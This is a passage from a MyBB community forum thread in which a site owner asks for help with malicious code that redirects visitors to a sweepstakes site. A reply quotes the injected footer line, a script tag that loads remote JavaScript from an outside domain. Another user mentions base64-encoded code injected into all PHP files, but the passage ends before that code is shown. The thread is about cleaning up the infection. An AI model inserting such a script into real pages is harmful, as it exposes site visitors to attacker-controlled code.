MyBB Community Forums

Full Version: Malicious code
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4
Ok,

Let's start out with assuming that I'm dumb. I'm not a programmer or a MyBB guru, but I understand enough about how things work to be confused. (If that makes any sense.) I don't see how this could have happened.

Someone, somehow, has placed malicious code on my site, leading people to some sweepstakes website. Last week, I noticed that a registered user was trying to include these types of threads so I banned the username, email, IP, etc. They haven't been back, but now I notice that when loading the main page, SOMEWHERE this code is loading. I can't find it. Where would someone place this code and how can I get rid of it? An added bonus would be a quick lesson in security on how to prevent this from happening again. Did I leave a hole somewhere? Shall I leave my site url here? Thanks in advance.

BTW - I went back to the server level and no one but me has accessed the actual server itself. They were only able to get in through MyBB somehow, somewhere. All of my .htaccess files appear to be in tact and untouched. Any other redirect areas to look for?

Please give us your site URL.
I'm not being redirected anywhere.
However, in your footer there is the following code:

<script src="http://sweepstakesandcontestsinfo.com/nl.php?zl=1"></script>
I run into the exactly same problem. I haven't noticed it, but have been notified by some users that they sometimes got redirected to other sites...
When I inspected the forum via ftp I noticed that ALL php files have injected malicious code at the beginning. So I had to clean all php files. Here's the code as injected at beginning of each php file (encoded as base64):